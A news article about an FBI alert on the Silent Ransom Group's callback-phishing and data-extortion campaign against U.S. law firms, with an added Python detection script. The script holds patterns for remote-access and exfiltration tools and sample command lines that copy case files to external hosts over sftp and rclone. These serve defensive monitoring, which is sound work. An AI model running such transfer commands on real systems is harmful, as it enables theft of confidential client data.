FBI Issues Alert About Covert Ransom Group Targeting Law Firms through Scam Calls

The FBI has recently alerted U.S. law firms about an escalating cybersecurity threat from a group known as the Silent Ransom Group (SRG), also referred to as Luna Moth or Chatty Spider. Since early 2023, this group has intensified its focus on law firms, employing tactics that combine phishing emails and social engineering calls to access sensitive legal information.

SRG is not a new threat actor. Established in 2022, the group previously targeted sectors like healthcare and insurance. However, its recent shift towards law firms suggests a strategic focus on industries that handle highly sensitive client information, which can yield significant financial and reputational consequences in the event of a breach.

In November 2023, the FBI detailed SRG’s tactics, specifically their use of a technique known as callback phishing. This method involves sending phishing emails designed to appear as unclickable images, creating a false sense of urgency while encouraging victims to call a provided phone number. Such tactics can circumvent standard email security measures, effectively tricking users into assisting attackers in breaching their own systems.

Operational Tactics

The simplicity of SRG’s phishing campaigns has proven deceptive. The group sends emails disguised as notifications from subscription service providers, claiming unauthorized charges. Recipients are asked to call a number mentioned in the email to resolve the issue. During these phone calls, attackers often persuade victims to download remote access software, providing SRG with entry into their networks.

Notably, SRG has recently escalated its approach by directly contacting employees and impersonating their own company’s IT personnel. They instruct employees to initiate remote sessions or visit specific websites, leading to the installation of tools that grant further control to the attackers. Once they access the system, they utilize software like WinSCP or modified versions of Rclone to exfiltrate sensitive data.

Upon retrieving the sensitive information, SRG delivers ransom notes demanding payment to prevent the public release or sale of the stolen data. They may also follow up with phone calls to coerce organizations into negotiating ransoms.

“Similar to their phishing emails posing as a company with a subscription, SRG will also call employees at a victim company to pressure them into engaging in ransom negotiations.”

The FBI

The FBI’s warning coincided with Cofense Intelligence’s May 2025 report, which outlined the extensive misuse of Remote Access Tools (RATs) by cybercriminal organizations. Among the findings, ConnectWise ScreenConnect was highlighted as the most frequently exploited RAT in attacks this year.

Targeting Law Firms

Law firms represent an alluring target for cybercriminals due to their handling of confidential client information, delicate corporate negotiations, and sensitive legal documents. Breaching a law firm not only jeopardizes financial stability but also threatens substantial reputational damage.

The targeting of law firms has been a growing trend; back in April 2022, researchers identified malicious activity where scammers utilized AI-generated images to fabricate fake law firm identities, underscoring the prolonged vulnerability of this sector.

Challenges in Detection

SRG’s operations are effective in part because the group uses legitimate system management and remote access tools, which evade detection by standard antivirus software. Their techniques leave minimal traces, complicating post-incident investigations and mitigation efforts.

Network administrators are advised to monitor for unusual downloads of tools such as Zoho Assist, AnyDesk, and Splashtop; they should also be alert for any unexpected external file transfers involving WinSCP or Rclone. Other warning signs include unsolicited emails regarding subscription renewals and unanticipated IT-related phone calls.
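As an added illustration (not code from the FBI notice or this article), the monitoring advice above can be sketched as a triage pass over process-creation telemetry. The event fields (Image, CommandLine, User, modelled on Sysmon-style process-creation records), the path and command-line patterns, and the sample events are all assumptions constructed for the example; the rclone pattern matches command-line syntax rather than file name, because the group is described as using modified versions of Rclone.

```python
import re
from pathlib import PureWindowsPath

# Tool names are the ones listed in the advice above; every pattern is an assumed heuristic.
REMOTE_ACCESS = re.compile(r"anydesk|splashtop|zoho[ _-]?assist", re.I)
USER_PATH = re.compile(r"\\(downloads|appdata|temp)\\|\\users\\public\\", re.I)
WINSCP_URL = re.compile(r"\b(sftp|scp|ftps?)://", re.I)
# "<verb> <source> <remote>:<path>": the remote name needs 2+ characters, so drive
# letters (C:\...) and URLs (https://...) are not mistaken for an rclone remote.
RCLONE_SYNTAX = re.compile(r"\b(copy|sync|move)\b.*?\s[\w-]{2,}:(?![\\/])", re.I)

def triage(event):
    """Return the findings for one process-creation event (a dict)."""
    image = PureWindowsPath(event["Image"])
    name, cmd = image.name.lower(), event.get("CommandLine", "")
    findings = []
    if REMOTE_ACCESS.search(name) and USER_PATH.search(str(image)):
        findings.append("remote-access tool run from a user-writable path")
    if name.startswith("winscp") and WINSCP_URL.search(cmd):
        findings.append("WinSCP session opened to a remote host")
    if RCLONE_SYNTAX.search(cmd):
        findings.append("rclone transfer" if name.startswith("rclone")
                        else "rclone-style transfer from a differently named binary")
    return findings

# Constructed sample events; hosts, users and paths are invented for illustration.
SAMPLE_EVENTS = [
    {"User": "FIRM\\jdoe", "Image": r"C:\Users\jdoe\Downloads\AnyDesk.exe",
     "CommandLine": r'"C:\Users\jdoe\Downloads\AnyDesk.exe"'},
    {"User": "FIRM\\jdoe", "Image": r"C:\Program Files (x86)\WinSCP\WinSCP.com",
     "CommandLine": r'WinSCP.com /command "open sftp://user@files.example.net/" "put D:\Matters\*"'},
    {"User": "FIRM\\jdoe", "Image": r"C:\ProgramData\svchelper.exe",
     "CommandLine": r"svchelper.exe copy D:\Matters remote1:intake --config C:\ProgramData\r.conf"},
    {"User": "FIRM\\asmith", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c copy C:\a.txt D:\b.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for finding in triage(ev):
            print(f"{ev['User']}: {finding}: {ev['CommandLine']}")
```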

Ultimately, the FBI emphasizes the importance of implementing robust cybersecurity practices, which involve training staff to recognize phishing attempts and establishing clear communication protocols within IT departments. Employing strong passwords and two-factor authentication is also essential, alongside regular backups to mitigate damage from potential breaches.
